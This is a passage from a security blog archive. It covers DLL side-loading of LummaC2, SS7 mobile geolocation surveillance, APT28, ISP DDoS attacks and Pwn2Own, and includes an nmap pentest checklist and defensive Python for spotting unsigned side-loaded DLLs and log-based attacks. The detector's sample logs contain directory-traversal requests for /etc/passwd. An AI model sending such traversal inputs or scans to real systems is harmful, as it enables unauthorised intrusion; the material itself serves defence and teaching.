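EXAMPLE_BASE = "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
EXAMPLE_FULL = EXAMPLE_BASE + "/E:P/MAC:H/MPR:L"

if __name__ == "__main__":
    for v in (EXAMPLE_BASE, EXAMPLE_FULL):
        print(assess(v)[0], v)
    # 'S' is the Safety supplemental metric in 4.0; Scope (S:U/S:C) no longer exists.
    print("S:U accepted?", is_valid(EXAMPLE_BASE + "/S:U"))
```

Feeding an advisory's vector through parse_vector before storing it catches the common mistake of pasting a 3.x-style vector (Scope, Temporal metrics) into a 4.0 field.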


Tags: CVSS 4.0


Nov 02 2023

Implementation Guide ISO/IEC 27001:2022

Category: ISO 27k | disc7 @ 9:00 am

Implementation Guide ISO/IEC 27001:2022 by ISACA Germany Chapter.

About This Guide
Practical guide for the implementation of an Information Security Management System (ISMS) according to ISO/IEC 27001:2022

About ISO/IEC 27001:2022
ISO/IEC 27001 promotes a holistic approach to information security: vetting people, policies and technology. An information security management system implemented according to this standard is a tool for risk management, cyber-resilience and operational excellence.

ISACA Germany Chapter
Homepage can be found here https://lnkd.in/gRu8kT75


Tags: Implementation Guide ISO/IEC 27001:2022


Nov 01 2023

Hackers Deliver Malicious DLL Files Chained With Legitimate EXE Files

Category: Hacking, Information Security | disc7 @ 9:31 am

Hackers opt for DLL hijacking as a technique to exploit vulnerable applications because it allows them to load malicious code by tricking a legitimate application into loading a malicious DLL.

This can give them unauthorized access and control over a system or application, enabling various types of attacks like:- 

  • Privilege escalation
  • Data theft
  • System compromise

An active threat involves an Infostealer distributing a legitimate EXE file alongside a hidden malicious DLL in the same directory.

The legitimate EXE runs the malicious DLL, a technique known as DLL hijacking, commonly used for malware distribution.

Malicious DLL With Legitimate EXE Files

Malware posing as software cracks is growing at a rapid pace and is getting distributed by the threat actors using DLL hijacking.

Users searching for cracked software are led to malicious sites, and the downloads are password-protected, encrypted RAR files.

Running the EXE infects the system, and the files often carry valid signatures, so always be cautious with cracked software, reads the ASEC report.

Distribution of the malware via webpages (Source - ASEC)

The malicious DLLs are legitimate DLLs with a small part modified so that they decrypt and run data from a nearby file. Hiding the data this way leaves the DLL’s appearance largely unchanged, reducing the risk of detection.

For malware to work, the following elements are required to be placed in the same folder:-

  • Data
  • EXE
  • Modified DLL

Unzipping the password-protected file with the password “2023” gives the following files:

Contents of compressed file (Source - ASEC)

The following two files are genuine VLC files with valid signatures:-

  • Setup.exe
  • libvlc.dll

“libvlccore.dll” has been altered and no longer carries a matching signature; the extra directories such as demux and lua are there to make the package look like a genuine VLC installation and mask its malicious nature.

Running ‘Setup.exe’ loads ‘libvlccore.dll,’ triggering a modified function that reads and decrypts ‘ironwork.tiff’ in the same folder. This file holds the code data, disguised as a PNG image.

It then loads “pla.dll” from SysWow64 and injects code into that module’s memory in a way that differs from typical malware. The method relies on NTDLL relocation: for “cmd.exe,” it loads “pla.dll” and injects the malware into it.

A data file is written to %TEMP%; the cmd.exe process inherits it, and its entry point is redirected to the injected “pla.dll” code. That code decrypts the file, produces the LummaC2 malware, then launches “explorer.exe” and injects and executes the binary in it.

Process tree of malware execution (Source - ASEC)

LummaC2 can install additional malware fetched from its C2 server and steals a range of sensitive data, receiving its instructions as JSON-formatted responses from the C2.

Because the malware is launched by a legitimately signed EXE and its DLL looks like the original, it poses a low detection risk.
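As an added defender-side check (not ASEC’s code and not part of the original post), the Python below parses PE headers to find the arrangement described here: a signed EXE sitting beside a DLL that carries no Authenticode signature. `build_minimal_pe` is a constructed test fixture, and the only assumption is that a legitimately signed application DLL carries an embedded signature (catalog-signed system DLLs do not, so point it at application folders rather than System32).

```python
"""Flag DLLs that sit beside a signed EXE but carry no embedded
Authenticode signature: the layout the ASEC analysis describes (signed
Setup.exe and libvlc.dll next to a modified, unsigned libvlccore.dll).

Added example, not ASEC's tooling. It only checks whether a PE file
contains a signature (IMAGE_DIRECTORY_ENTRY_SECURITY is non-empty);
validating the certificate chain needs signtool or the Windows API."""
import os
import struct
import sys

SECURITY_DIR_INDEX = 4          # IMAGE_DIRECTORY_ENTRY_SECURITY


def has_embedded_signature(data: bytes) -> bool:
    """True if the PE's security data directory has a non-zero size."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return False
    coff = e_lfanew + 4                     # IMAGE_FILE_HEADER (20 bytes)
    if len(data) < coff + 20:
        return False
    size_opt = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20                         # IMAGE_OPTIONAL_HEADER
    if size_opt == 0 or len(data) < opt + size_opt:
        return False
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x10B:                      # PE32
        n_rva_off, dirs_off = 92, 96
    elif magic == 0x20B:                    # PE32+
        n_rva_off, dirs_off = 108, 112
    else:
        return False
    n_dirs = struct.unpack_from("<I", data, opt + n_rva_off)[0]
    if n_dirs <= SECURITY_DIR_INDEX:
        return False
    entry = opt + dirs_off + SECURITY_DIR_INDEX * 8
    _file_offset, size = struct.unpack_from("<II", data, entry)
    return size != 0


def find_sideload_candidates(files: dict) -> list:
    """`files` maps filename -> bytes for one directory.  Returns
    (exe, dll) pairs where the EXE is signed and the DLL is not."""
    signed_exes = [n for n, d in files.items()
                   if n.lower().endswith(".exe") and has_embedded_signature(d)]
    unsigned_dlls = [n for n, d in files.items()
                     if n.lower().endswith(".dll") and not has_embedded_signature(d)]
    return [(e, d) for e in signed_exes for d in unsigned_dlls]


def scan_directory(path: str) -> list:
    """Read every .exe/.dll in `path` and run the pairing check."""
    files = {}
    for name in os.listdir(path):
        full = os.path.join(path, name)
        if os.path.isfile(full) and name.lower().endswith((".exe", ".dll")):
            with open(full, "rb") as fh:
                files[name] = fh.read()
    return find_sideload_candidates(files)


def build_minimal_pe(signed: bool, pe32plus: bool = False) -> bytes:
    """Constructed fixture: a header-only PE with the security directory
    either filled in (signed=True) or zeroed.  Not a loadable image."""
    opt_size = 240 if pe32plus else 224
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)     # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, opt_size, 0x102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x20B if pe32plus else 0x10B)
    n_rva_off, dirs_off = (108, 112) if pe32plus else (92, 96)
    struct.pack_into("<I", opt, n_rva_off, 16)  # NumberOfRvaAndSizes
    if signed:
        struct.pack_into("<II", opt, dirs_off + SECURITY_DIR_INDEX * 8, 0x1000, 0x800)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    for exe, dll in scan_directory(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"signed {exe} next to unsigned {dll}: possible side-loading")
```

A hit is a lead, not a verdict: the next step is `signtool verify /pa` (or `Get-AuthenticodeSignature`) on the DLL and a hash comparison against the vendor’s release of the same file.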

IOCs

IOCs (Source – ASEC)

InfoSec tools | InfoSec services | InfoSec books | Follow our blog | DISC llc is listed on The vCISO Directory

Tags: Malicious DLL


Oct 31 2023

THE ART OF INTERCEPTION :ACTIVE AND PASSIVE SURVEILLANCE IN MOBILE SIGNALING NETWORKS

Category: Cyber surveillance,Mobile Securitydisc7 @ 7:23 am

Mobile network data may be one of the most recent and thorough dossiers on us. Our mobile phones are linked to these networks and expose our demographics, social circles, purchasing habits, sleeping patterns, where we live and work, and travel history. Technical weaknesses in mobile communications networks threaten this aggregate data. Such vulnerabilities may reveal private information to numerous and varied players and are closely tied to how mobile phones roam among cell providers when their owners travel. These vulnerabilities are usually related to signalling messages carried across telecommunications networks, which expose phones to possible location disclosure.

Telecommunications networks use private, open signalling links. These connections enable local and international roaming, allowing mobile phones to smoothly switch networks. These signalling protocols also enable networks to obtain user information including if a number is active, whether services are accessible, to which national network they are registered, and where they are situated. These connections and signalling protocols are continually targeted and exploited by surveillance actors, exposing our phones to several location disclosure techniques.

Most illegal network-based location disclosure is possible because mobile telecommunications networks interconnect. Foreign intelligence and security agencies, commercial intelligence businesses, and law enforcement routinely want location data, and law enforcement and intelligence agencies may obtain geolocation information covertly using tactics similar to those employed by criminals. We refer to all of these players as ‘surveillance actors’ throughout this paper, since they share an interest in mobile geolocation surveillance.

Despite worldwide 4G network adoption and fast developing 5G network footprint, many mobile devices and their owners use 3G networks. The GSMA, which offers mobile industry information, services, and rules, reports 55% 3G subscriber penetration in Eastern Europe, the Middle East, and Sub-Saharan Africa. The UK-based mobile market intelligence company Mobilesquared estimates that just 25% of mobile network operators globally had built a signalling firewall to prevent geolocation spying by the end of 2021. Telecom insiders know that the vulnerabilities in the 3G roaming SS7 signalling protocol have allowed commercial surveillance products to provide anonymity, multiple access points and attack vectors, a ubiquitous and globally accessible network with an unlimited list of targets, and virtually no financial or legal risks.

The research by Citizen Lab focuses on geolocation risks from attacks on mobile signalling networks. Active or passive surveillance may reveal a user’s position through these networks, and actors may use numerous strategies to do so.

The two methods differ significantly. Active surveillance employs software to trigger a mobile network response containing the target phone’s position, whereas passive surveillance uses a collection device to retrieve phone locations directly from the network. In active attacks, an adversarial network uses software to send forged signalling messages to susceptible target mobile networks in order to query and retrieve the target phone’s geolocation. Such attacks are possible on networks without properly implemented or configured security safeguards. Unless they can install or access passive collection devices in global networks, an actor leasing a network can only use active surveillance tactics.

However, cell operators and others may also be compelled to conduct active and passive monitoring. In this case, the network operator may be legally required to allow monitoring, or may face a hostile insider accessing mobile networks unlawfully. A third party might gain access to the operator or provider by compromising VPN access to targeted network systems, allowing them to gather active and passive user location information.

The report primarily discusses geolocation threats in mobile signaling networks. These threats involve surveillance actors using either active or passive methods to determine a user’s location.

Active Surveillance:

  • In active surveillance, actors use software to interact with mobile networks and get a response with the target phone’s location.
  • Vulnerable networks without proper security controls are susceptible to active attacks.
  • Actors can access networks through lease arrangements to carry out active surveillance.

Passive Surveillance:

  • In passive surveillance, a collection device is used to obtain phone locations directly from the network.
  • Surveillance actors might combine active and passive methods to access location information.

Active Attacks:

  • Actors use software to send crafted signaling messages to target mobile networks to obtain geolocation information.
  • They gain access to networks through commercial arrangements with mobile operators or other service providers connected to the global network.

Vulnerabilities in Home Location Register (HLR) Lookup:

  • Commercial HLR lookup services can be used to check the status of mobile phone numbers.
  • Surveillance actors can pay for these services to gather information about the target phone’s location, country, and network.
  • Actors with access to the SS7 network can perform HLR lookups without intermediary services.

Domestic Threats:

  • Domestic location disclosure threats are concerning when third parties are authorized by mobile operators to connect to their network.
  • Inadequate configuration of signaling firewalls can allow attacks originating from within the same network to go undetected.
  • In some cases, law enforcement or state institutions may exploit vulnerabilities in telecommunications networks.

Passive Attacks:

  • Passive location attacks involve collecting usage or location data using network-installed devices.
  • Signaling probes and monitoring tools capture network traffic for operational and surveillance purposes.
  • Surveillance actors can use these devices to track mobile phone locations, even without active calls or data sessions.

Packet Capture Examples of Location Monitoring:

  • Packet captures show examples of signaling messages used for location tracking.
  • Location information, such as GPS coordinates and cell information, can be exposed through these messages.
  • User data sessions can reveal information like IMSI, MSISDN, and IMEI, allowing for user tracking.

The report highlights the various methods and vulnerabilities that surveillance actors can exploit to obtain the geolocation of mobile users, both domestically and internationally. Based on past, present, and future mobile network security evaluations, geolocation monitoring should continue to alarm the public and policymakers. Exploitable vulnerabilities in 3G, 4G, and 5G network designs are predicted to persist without forced openness that exposes poor practices and accountability mechanisms that require operators to fix them. All three network types give surveillance actors more possibilities. If nation states and organised crime entities can actively monitor mobile phone locations domestically or abroad, such vulnerabilities will continue to threaten at-risk groups, corporate staff, military, and government officials.

Is My Cell Phone Bugged?: Everything You Need to Know to Keep Your Mobile Conversations Private


Tags: MOBILE SIGNALING NETWORKS


Oct 30 2023

Proactive Boards Lead to Flexible CISOs as Companies Prepare for What’s to Come

Category: CISO,vCISOdisc7 @ 1:25 pm

In the leadership and communications section, Proactive Boards Enable More Reliable Cyber Governance, CISO Best Practices for Managing Cyber Risk, The Evolution of Work: How Can Companies Prepare for What’s to Come?, and more!

Visit https://www.securityweekly.com/bsw for all the latest episodes!

Show Notes: https://securityweekly.com/bsw-326


Oct 30 2023

IT ARMY OF UKRAINE DISRUPTED INTERNET PROVIDERS IN TERRITORIES OCCUPIED BY RUSSIA

Category: Cyber Attackdisc7 @ 10:39 am

IT Army of Ukraine hacktivists have temporarily disrupted internet services in some of the territories that have been occupied by Russia.

Ukrainian hacktivists belonging to the IT Army of Ukraine group have temporarily disabled internet services in some of the territories that have been occupied by the Russian army.

After the invasion of Crimea and eastern Ukraine, Ukrainian telecommunications infrastructure was disabled by Russian soldiers.

The hacktivists carried out DDoS attacks against the three Russian internet providers “Miranda-media,” “Krimtelekom,” and “MirTelekom.” The IT Army is inviting supporters to join its operations by installing its software.

“We continue targeting internet and telecom providers to disrupt enemy communications. Today, our intel orchestrated a “thousand proxies” strike, disabling “Miranda-media,” “Krimtelekom,” and “MirTelekom.” This affects not only Crimea but also occupied parts of Kherson, Zaporizhia, Donetsk, and Luhansk regions. Another blow by our cyber army disrupting enemy military communication at the frontlines.” reads the message published by the group IT Army of Ukraine on its Telegram channel.

The Miranda Media ISP announced on Friday that it was facing a massive DDoS attack.

“Digital services operator Miranda-Media has been recording an unprecedented level of DDoS attacks from Ukrainian hacker groups since 9.05 am on October 27, 2023. As a result, there is a temporary unavailability of the services of Miranda-Media, Krymtelecom and MirTelecom.” reads the announcement.

“All technical and IT services of the company have been placed on high alert. All necessary measures are being taken to restore the network’s functionality. We will inform you further about the progress of the work.”

The Russian ISP mitigated the attack by the end of Friday and partially restored its services on Friday evening.

Telecommunication infrastructure and internet services are critical infrastructure and were targeted by both Russian and Ukrainian threat actors.

The Russia-linked APT group Sandworm (UAC-0165) compromised eleven telecommunication service providers in Ukraine between May and September 2023, Ukraine’s Computer Emergency Response Team (CERT-UA) reported.

According to public sources, the threat actors targeted the information and communication systems (ICS) of at least 11 Ukrainian telecommunications providers, leading to the disruption of their services.

“According to public sources, for the period from 11.05.2023 to 27.09.2023, an organized group of criminals tracked by the identifier UAC-0165 interfered with the information and communication systems (ICS) of no less than 11 telecommunications providers of Ukraine, which, among other things, led to interruptions in the provision of services to consumers.” reads the advisory published by the CERT-UA.

Internet Provider Security A Complete Guide


Tags: Internet Provider Security, INTERNET PROVIDERS


Oct 27 2023

HOW APT28 INFILTRATES NETWORKS IN FRENCH UNIVERSITIES & NUCLEAR PLANTS WITHOUT DETECTION

Category: APT,Information Securitydisc7 @ 1:19 pm

According to a recent report published by France’s leading cybersecurity agency, a hacking group affiliated with Russia’s military intelligence agency has been spying on French colleges, corporations, think tanks, and government institutions.

Since the second half of 2021, the group known as Fancy Bear or APT28 has been operating covertly in French computer networks to acquire a variety of sensitive data. According to the investigation by France’s National Cybersecurity Agency (ANSSI), the attackers compromised systems that were not actively monitored, such as routers, and refrained from deploying backdoors in order to avoid discovery. After analysing the group’s tactics, techniques, and procedures (TTPs), ANSSI concluded that APT28 gains access to accounts and Ubiquiti routers on target networks through brute force and leaked credentials. In April 2023, a phishing campaign was launched to obtain system settings, running processes, and other relevant data. Using the flaw identified as CVE-2023-23397, APT28 sent emails to Outlook users between March 2022 and June 2023. For reconnaissance and data collection, the attackers also exploited other vulnerabilities, such as CVE-2022-30190 (Follina) in the Microsoft Windows Support Diagnostic Tool (MSDT) and CVE-2020-12641 in Roundcube webmail.

To carry out their intrusions, the group used tools such as the password harvester Mimikatz and the traffic relay tool reGeorg, as well as open-source services such as Mockbin and Mocky. APT28 also uses a wide variety of VPN clients.

As a cyber-espionage group, APT28’s primary mission is to gain unauthorised access to its targets and steal information. The hackers harvested authentication details with common tools and stole sensitive information, including emails full of personal information, from email accounts. Their command and control (C2) infrastructure is built on cloud services such as Google Drive and Microsoft OneDrive, which makes it harder to identify.

ANSSI has mapped the TTPs (techniques, tactics, and procedures) of APT28 and found that the threat organisation breaches accounts and Ubiquiti routers on targeted networks by using brute-force attacks and leaked databases holding passwords.

In one incident that occurred in April 2023, the adversaries carried out a phishing effort that duped the receivers into executing PowerShell, which revealed their system settings, running processes, and other OS-related information.

APT28 is responsible for sending emails to Outlook users that attacked a zero-day vulnerability that is now known as CVE-2023-23397. These emails were sent between March 2022 and June 2023, which places the first exploitation a month earlier than what was previously revealed.

ANSSI emphasises a comprehensive approach to security that includes conducting risk assessments. Given the threat posed by APT28, particular attention should be paid to securing email. The agency’s most important recommendations on email security are:

  • Protect the confidentiality of email communications and prevent their disclosure by adopting secure exchange systems, so that email traffic cannot be diverted or captured.
  • Reduce the attack surface of email web interfaces and manage the risks posed by servers such as Microsoft Exchange.
  • Put in place mechanisms that can identify malicious emails.

Attribution of Advanced Persistent Threats: How to Identify the Actors Behind Cyber-Espionage



Oct 26 2023

Most Important Network Penetration Testing Checklist

Category: Cheat Sheet,Information Security,Pen Testdisc7 @ 9:25 am

A network penetration testing checklist helps determine weaknesses in the network posture by discovering open ports, identifying live systems and services, and grabbing system banners.

Pen testing helps the administrator close unused ports, remove unnecessary services, hide or customize banners, troubleshoot services, and calibrate firewall rules.

You should test in all ways to guarantee there is no security loophole.

Network penetration testing, also known as ethical hacking or white-hat hacking, is a systematic process of evaluating the security of a computer network infrastructure.

The goal of a network penetration test is to identify vulnerabilities and weaknesses in the network’s defenses that malicious actors could potentially exploit.

Let’s see how we conduct step-by-step Network penetration testing by using some famous network scanners.

1. Host Discovery

Footprinting is the first and most important phase where one gathers information about their target system.

DNS footprinting helps to enumerate the DNS records (A, MX, NS, SRV, PTR, SOA, and CNAME) associated with the target domain.

  • A – An A record points a domain name such as gbhackers.com to the IP address of its hosting server.
  • MX – Mail exchanger records identify the servers responsible for email exchange.
  • NS – NS records identify the DNS servers responsible for the domain.
  • SRV – Service records identify which servers host a specific service.
  • PTR – Reverse DNS lookup: given an IP address, you can find the domain names associated with it.
  • SOA – Start of Authority: information in the DNS system about the DNS zone and its other records.
  • CNAME – A CNAME record maps a domain name to another domain name.

We can detect live hosts, and accessible hosts in the target network by using network scanning tools such as Advanced IP scanner, NMAP, HPING3, and NESSUS.

Ping & Ping Sweep:

root@kali:~# nmap -sn 192.168.169.128                Single host
root@kali:~# nmap -sn 192.168.169.128-20             To scan a range of IPs
root@kali:~# nmap -sn 192.168.169.*                  Wildcard
root@kali:~# nmap -sn 192.168.169.128/24             Entire subnet

Whois Information

To obtain Whois information and the name server of a website:

root@kali:~# whois testdomain.com

  1. http://whois.domaintools.com/
  2. https://whois.icann.org/en

Traceroute

Network diagnostic tool that displays the route path and transit delays of packets:

root@kali:~# traceroute google.com

Online Tools

  1. http://www.monitis.com/traceroute/
  2. http://ping.eu/traceroute/

2. Port Scanning

Perform port scanning using tools such as Nmap, Hping3, Netscan tools, and Network monitor. These tools help us to probe a server or host on the target network for open ports.

root@kali:~# nmap --open gbhackers.com              To find all open ports
root@kali:~# nmap -p 80 192.168.169.128             Specific port
root@kali:~# nmap -p 80-200 192.168.169.128         Range of ports
root@kali:~# nmap -p "*" 192.168.169.128            To scan all ports

Online Tools

  1. http://www.yougetsignal.com/
  2. https://pentest-tools.com/information-gathering/find-subdomains-of-domain

3. Banner Grabbing/OS Fingerprinting

Perform banner grabbing/OS fingerprinting with tools such as Telnet, IDServe, and Nmap to determine the operating system and service versions of the target host.

Once you know the version and operating system of the target, you need to find the vulnerabilities and exploit them. Try to gain control over the system.

root@kali:~# nmap -A 192.168.169.128
root@kali:~# nmap -v -A 192.168.169.128              With a high verbosity level

IDserve is another good tool for Banner Grabbing.

Network pentesting flowchart (figure)

Online Tools

  1. https://www.netcraft.com/
  2. https://w3dt.net/tools/httprecon
  3. https://www.shodan.io/

4. Scan For Vulnerabilities

Scan the network for vulnerabilities using GFI LanGuard, Nessus, Retina CS, or SAINT.

These tools help us find vulnerabilities in the target and operating systems. With these steps, you can find loopholes in the target network system.

GFI LanGuard

It acts as a security consultant and offers patch management, vulnerability assessment, and network auditing services.

Nessus

Nessus is a vulnerability scanner tool that searches for bugs in software and finds a specific way to violate the security of a software product.

  • Data gathering.
  • Host identification.
  • Port scan.
  • Plug-in selection.
  • Reporting of data.

5. Draw Network Diagrams

Draw a network diagram about the organization that helps you understand the logical connection path to the target host in the network.

The network diagram can be drawn by LANmanager, LANstate, Friendly pinger, and Network View.

6. Prepare Proxies

Proxies act as an intermediary between two networking devices. A proxy can protect the local network from outside access.

With proxy servers, we can anonymize web browsing and filter unwanted content such as ads.

Proxy tools such as Proxifier, SSL Proxy, and Proxy Finder are used to keep the tester’s origin from being identified.

7. Document All Findings

The last and very important step is to document all the findings from penetration testing.

This document will help you find potential vulnerabilities in your network. Once you determine the Vulnerabilities, you can plan counteractions accordingly.

You can download the rules and scope Worksheet here: Rules and Scope sheet 

Thus, penetration testing helps assess your network before it gets into real trouble that may cause severe loss in terms of value and finance.

Important Tools Used For Network Pentesting

Frameworks

Kali Linux, Backtrack5 R3, Security Onion

Reconnaissance

Smartwhois, MxToolbox, CentralOps, dnsstuff, nslookup, DIG, netcraft

Discovery

Angry IP scanner, Colasoft ping tool, nmap, Maltego, NetResident,LanSurveyor, OpManager

Port Scanning

Nmap, Megaping, Hping3, Netscan tools pro, Advanced port scanner

Service Fingerprinting

Xprobe, nmap, zenmap

Enumeration

Superscan, Netbios enumerator, Snmpcheck, onesixtyone, Jxplorer, Hyena,DumpSec, WinFingerprint, Ps Tools, NsAuditor, Enum4Linux, nslookup, Netscan

Scanning

Nessus, GFI Languard, Retina,SAINT, Nexpose

Password Cracking

Ncrack, Cain & Abel, LC5, Ophcrack, pwdump7, fgdump, John The Ripper,Rainbow Crack

Sniffing

Wireshark, Ettercap, Capsa Network Analyzer

MiTM Attacks

Cain & Abel, Ettercap

Exploitation

 Metasploit, Core Impact

These are the most important checklist items to concentrate on in network penetration testing.

Also Read:

Penetration Testing – Protecting Networks and Systems


Tags: Network Penetration Testing Checklist


Oct 26 2023

PWN2OWN TORONTO 2023 DAY 1 – ORGANIZERS AWARDED $438,750 IN PRIZES

Category: HackingDISC @ 7:13 am

During Day 1 of the Pwn2Own Toronto 2023 hacking contest, the organizers awarded a total of $438,750 in prizes.

Team Orca of Sea Security received the greatest rewards of the day, the researchers chained two issues using an OOB Read and UAF against the Sonos Era 100. They earned $60,000 and 6 Master of Pwn points.

Researchers from Pentest Limited demonstrated an Improper Input Validation against the Samsung Galaxy S23. They earned $50,000 and 5 Master of Pwn points.

The team STAR Labs SG exploited a permissive list of allowed inputs against the Samsung Galaxy S23 and earned $25,000 and 5 Master of Pwn points.

Pentest Limited also earned $40,000 and 4 Master of Pwn points by executing a 2-bug chain against the My Cloud Pro Series PR4100 using a DoS and server-side request forgery (SSRF).

Team Viettel demonstrated a single-bug attack against the Xiaomi 13 Pro and earned $40,000 and 4 Master of Pwn points.

Team ECQ also earned $40,000 and 4 Master of Pwn points by executing a 3-bug chain using an SSRF and two injection vulnerabilities against the QNAP TS-464.

Binary Factory and Synacktiv demonstrated working attacks against the Synology BC500 and earned $30,000 and 3 Master of Pwn points and $15,000 and 3 Master of Pwn points respectively.

Compass Security also executed a stack overflow attack against the Synology BC500, but the exploit they used was previously known. They still earned $3,750 and 0.75 Master of Pwn points.

Other successful attacks were demonstrated against Canon imageCLASS MF753Cdw and Lexmark CX331adwe.

Below is the leaderboard after Pwn2Own Toronto 2023 Day 1.

https://x.com/thezdi/status/1717319411688747052?s=20

Tags: pwn2own


Oct 23 2023

10 Best Hacker-Friendly Search Engines Of 2023

Category: Hacking,Information Security,Web Search Enginedisc7 @ 8:33 am

The search engines allow users to find any content via the world wide web.

It helps to find any information easily and is a web-based tool that allows someone to discover or detect any data.

Here are the best Hackers’ Search Engines.

There are various search engines available online that hackers use; this article describes the top search engines for hackers.

10 Best Hackers Search Engines

Search engine         | Key features
Shodan                | Very useful and easy to use; freely available
GreyNoise Visualizer  | Targeted scan and attack traffic
WiGLE                 | Wireless network mapping; has web applications
Censys                | Enhances general security; helps to find open ports
Hunter                | The most dynamic; also accessible through its API
Pipl                  | The world’s largest people search engine
PublicWWW             | Has an API for developers to integrate; shows millions of results for any search request
ZoomEye               | Very useful for investigators; used as a wayfinding tool in cyberspace
HIBP                  | One of the most powerful tools
OSINT Framework       | Open Source Intelligence framework; easy to use


Tags: Hacker-Friendly Search Engines


Oct 20 2023

Hackers Using Secure USB Drives To Attack Government Entities

Category: Cyber Attack,Hacking,Information Securitydisc7 @ 9:36 am

An ongoing attack on government agencies in the APAC region reportedly compromised a type of secure USB device with hardware encryption.

The nation’s government agencies utilize these safe USB devices to transfer and save data between computer systems.

The attacks had a very small number of victims and were highly targeted. The attacks are believed to have been conducted by a highly experienced and resourceful threat actor interested in conducting espionage operations in secure and private government networks.

Cyber Espionage Via Secure USBs

According to the Kaspersky APT trends report for Q3 2023, this long-running campaign comprises several malicious modules that may execute commands, gather data from infected workstations, and transfer it to further machines using the same or different secure USB drives. 

On the infected computers, the attackers can also execute additional malicious files.

The attack uses sophisticated tools and methods, such as virtualization-based software obfuscation for malware components, self-replication through connected secure USB drives to spread to other air-gapped systems, and code injection into a legitimate access management program on the USB drive that serves as a loader for the malware on a new machine.

BlindEagle, a financially motivated threat group, has targeted both people and governmental organizations in South America. Although espionage is the threat actor’s main objective, it has demonstrated interest in obtaining financial data.

BlindEagle is characterized by its capacity to cycle through different open-source remote access Trojans (RATs), including AsyncRAT, Lime-RAT, and BitRAT, and utilize them as the ultimate payload to accomplish its goals.

The gang sends spear-phishing emails with Microsoft Office documents attached to its victims. This starts a multi-level infection strategy that results in installing a new Trojan that is primarily made to steal data from the victim’s computer and take over by executing arbitrary commands.

APT campaigns are still widely spread geographically. Attackers have targeted Europe, South America, the Middle East, and other regions of Asia this quarter.

Government, military, defense, gaming, software, entertainment, utilities, banking, and manufacturing are just a few of the industries being attacked.

Cyber espionage continues to be a top priority of APT campaigns, and geopolitics continues to be a major factor in APT development.

“It is therefore very important to build a deep understanding of the TTPs of this threat actor and to watch out for future attacks,” reads the report.

https://gbhackers.com/hackers-using-secure-usb-attack-government-entities/

Kingston Ironkey Locker+ 50 16GB Encrypted USB Flash Drive | USB 3.2 Gen 1 | XTS-AES Protection | Multi-Password Security Options | Automatic Cloud Backup


Tags: encrypted usb drive, USB Drives To Attack


Oct 18 2023

XorDDoS Infects Linux Devices And Uses Them To Carry Out DDoS Attacks

Category: DDoS,Information Securitydisc7 @ 9:00 am

A new campaign has been discovered that uses XorDDoS Trojan, which affects Linux systems and devices, turning them into zombies that can be controlled by threat actors remotely.

Moreover, these compromised systems can later be used for DDoS (Distributed Denial-of-Service) attacks.

Comparing this current campaign with the campaign conducted in 2022, there was only one change found, which was the configuration of the C2 hosts.

However, the attacking domains were still unchanged. The threat actors seem to have migrated their offensive infrastructure to hosts running on legitimate public hosting services.

Additionally, with respect to the 2022 campaign, many security vendors have already classified the C2 domains as malicious and barred them but still the current active malware traffic is being directed to new IPs.

As part of the initial access vector, the threat actors scanned for hosts with HTTP service, vulnerable to directory traversal attacks that can enable access to arbitrary files on the server.

Threat actors specifically targeted the /etc/passwd file to read passwords. However, since the file has only encrypted passwords, they were forced to gain initial access through SSH brute-force attacks. Once they gained access, they downloaded malware from remote servers and owned the system.
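The two initial-access behaviours described above leave distinctive traces in ordinary server logs. As an added detection example (not part of the Unit42 analysis or this article), the Python below flags directory-traversal requests for /etc/passwd in a web access log and SSH password brute forcing in an auth log. Every log line is constructed for the example, and the 203.0.113.0/24 and 198.51.100.0/24 addresses are documentation ranges, not campaign IoCs.

```python
"""Detection logic for the two initial-access behaviours described
above: directory-traversal requests for /etc/passwd in web logs and
SSH password brute forcing in auth logs.  Added example; all log lines
are constructed, not taken from the campaign.  Note that /etc/passwd is
world-readable and, on a shadowed system, holds no password hashes at
all, which is why a traversal read is followed by SSH guessing."""
import re
from collections import Counter
from urllib.parse import unquote

# Constructed Apache/nginx-style access log lines
ACCESS_LOG = """\
203.0.113.7 - - [18/Oct/2023:09:00:01 +0000] "GET /index.html HTTP/1.1" 200 512
203.0.113.7 - - [18/Oct/2023:09:00:02 +0000] "GET /cgi-bin/../../../../etc/passwd HTTP/1.1" 200 1842
203.0.113.7 - - [18/Oct/2023:09:00:03 +0000] "GET /static/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 404 153
198.51.100.2 - - [18/Oct/2023:09:01:10 +0000] "GET /about HTTP/1.1" 200 230
"""

# Constructed sshd lines in the format found in /var/log/auth.log
AUTH_LOG = """\
Oct 18 09:05:01 host sshd[1201]: Failed password for root from 203.0.113.7 port 40122 ssh2
Oct 18 09:05:02 host sshd[1203]: Failed password for root from 203.0.113.7 port 40124 ssh2
Oct 18 09:05:02 host sshd[1205]: Failed password for invalid user admin from 203.0.113.7 port 40126 ssh2
Oct 18 09:05:03 host sshd[1207]: Failed password for root from 203.0.113.7 port 40128 ssh2
Oct 18 09:05:04 host sshd[1209]: Failed password for root from 203.0.113.7 port 40130 ssh2
Oct 18 09:05:09 host sshd[1211]: Accepted password for root from 203.0.113.7 port 40132 ssh2
Oct 18 09:06:00 host sshd[1300]: Failed password for alice from 198.51.100.2 port 51000 ssh2
"""

ACCESS_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
SSH_FAIL_RE = re.compile(r"Failed password for (?:invalid user )?\S+ from (\S+) port")
SSH_OK_RE = re.compile(r"Accepted password for \S+ from (\S+) port")


def traversal_hits(log: str) -> list:
    """(ip, decoded_path, status) for requests that climb out of the web
    root toward /etc/passwd; a 200 means the file was most likely served."""
    hits = []
    for line in log.splitlines():
        m = ACCESS_RE.match(line)
        if not m:
            continue
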